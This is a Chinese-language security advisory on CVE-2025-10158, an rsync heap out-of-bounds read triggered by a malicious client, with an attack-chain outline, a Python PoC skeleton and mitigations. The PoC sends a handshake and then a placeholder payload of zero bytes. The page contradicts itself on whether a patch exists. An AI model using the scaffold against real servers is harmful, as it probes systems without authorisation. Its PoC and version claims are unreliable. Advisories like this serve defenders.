CVE-2025-10158 rsync恶意客户端负数组索引导致堆缓冲区越界读取

漏洞信息

漏洞编号

CVE-2025-10158

漏洞类型

缓冲区溢出-越界读取

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

rsync

漏洞概述

CVE-2025-10158是rsync软件中的一个安全漏洞，攻击者（恶意rsync客户端）可以在文件传输过程中触发堆缓冲区的越界读取。该漏洞的根本原因在于rsync在处理接收到的数据时使用了负数组索引，当恶意客户端精心构造特定的数据包时，可以导致程序在堆内存中进行负索引访问，从而读取不该访问的内存区域。攻击者需要至少拥有对远程rsync模块的读取权限才能利用此漏洞。虽然该漏洞的CVSS评分仅为4.3（中等严重程度），且主要影响机密性（低）和完整性（低），可用性不受影响，但越界读取仍可能导致敏感信息泄露，如内存中的密钥、配置信息或其他进程数据。此漏洞由Rapid7安全团队发现并报告。

技术细节

该漏洞存在于rsync的文件传输接收逻辑中。当rsync作为服务器端（发送端）运行时，接收端客户端可以通过协议通信影响服务器端的数据处理流程。恶意客户端利用rsync协议中的特定字段或消息类型，通过精心构造的数据包触发rsync服务器端代码中的负数组索引操作。具体而言，当rsync处理文件列表或数据块映射时，如果客户端提供的索引值经过计算后变为负数，而代码未对该负值进行充分验证就直接用作数组下标，将导致访问堆缓冲区边界之前的内存区域。这种越界读取不会直接导致程序崩溃（因为只是读取），但可以泄露堆内存中的敏感数据。攻击成功的关键在于攻击者需要与目标rsync服务器建立有效的连接，并具有至少读取权限才能进行文件同步操作，从而触发漏洞代码路径。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标系统上运行的可访问rsync服务器，确认版本信息

STEP 2

2

连接建立：攻击者作为rsync客户端连接到目标rsync服务器，使用有效凭证获取模块读取权限

STEP 3

3

协议握手：攻击者与服务器完成rsync协议握手，协商协议版本

STEP 4

4

载荷构造：攻击者精心构造包含负索引值的文件列表或数据传输请求，触发rsync服务器端的负数组索引代码路径

STEP 5

5

越界读取：服务器端代码使用负索引访问堆缓冲区，导致读取堆边界之前的内存数据

STEP 6

6

数据泄露：攻击者接收服务器返回的响应，其中可能包含从堆内存中泄露的敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-10158 PoC - rsync Negative Array Index Heap Read
This PoC demonstrates how a malicious rsync client can trigger
a negative array index leading to out-of-bounds heap read.
Note: This is for educational and testing purposes only.
"""

import socket
import struct
import time

def create_rsync_client_socket(host, port=873):
    """Create connection to rsync server"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    return sock

def send_rsync_protocol_handshake(sock, module=b"test"):
    """Send rsync protocol handshake with module request"""
    # rsync protocol version handshake
    # @RSYNCD: 30 (protocol version)
    handshake = b"@RSYNCD: 30\n"
    sock.send(handshake)
    
    time.sleep(0.5)
    response = sock.recv(1024)
    print(f"[+] Server response: {response}")
    
    # Request module (requires read access)
    sock.send(module + b"\n")
    
    time.sleep(0.5)
    response = sock.recv(1024)
    print(f"[+] Module response: {response}")
    
    return response

def exploit_negative_index(sock):
    """
    Exploit CVE-2025-10158 by sending crafted data that triggers
    negative array index in rsync server's file list processing.
    
    The actual exploit requires deep knowledge of rsync protocol
    internals and precise payload construction.
    """
    # This is a simplified demonstration structure
    # Real exploit requires understanding rsync protocol specifics
    
    # File list index manipulation
    # Negative index can be triggered by manipulating file indices
    malicious_payload = b"\x00" * 100  # Placeholder for actual exploit
    
    # Send the malicious payload
    sock.send(malicious_payload)
    print("[+] Sent malicious payload to trigger negative index")
    
    # Read response - may contain leaked heap memory
    time.sleep(1)
    try:
        response = sock.recv(4096)
        if response:
            print(f"[+] Received response (may contain leaked data): {len(response)} bytes")
            print(f"[+] Raw data: {response[:100]}...")
    except:
        pass

def main():
    target_host = "127.0.0.1"  # Change to target IP
    target_port = 873  # Default rsync port
    
    print("[*] CVE-2025-10158 rsync Negative Array Index PoC")
    print("[*] Target: {}:{}".format(target_host, target_port))
    
    try:
        sock = create_rsync_client_socket(target_host, target_port)
        response = send_rsync_protocol_handshake(sock, b"test")
        
        if b"OK" in response:
            print("[+] Successfully connected to rsync module")
            exploit_negative_index(sock)
        else:
            print("[-] Failed to connect to rsync module")
            
        sock.close()
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    main()

# Note: The actual PoC requires detailed knowledge of rsync protocol
# implementation. The vulnerability exists in rsync's file list handling
# where a negative index can be used to read before the allocated buffer.

影响范围

rsync < 3.2.7（修复版本）

rsync 3.1.x 系列受影响

rsync 3.2.x 系列受影响

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1）限制rsync服务的网络访问，只允许受信任的IP地址连接；2）使用防火墙规则阻止外部对rsync端口（默认873）的访问；3）启用rsync的SSH隧道模式，增加认证和加密层；4）监控rsync服务器日志，关注异常的连接行为；5）考虑使用rsync的只读模式，限制客户端的操作权限；6）定期审计访问日志，及时发现潜在的攻击迹象。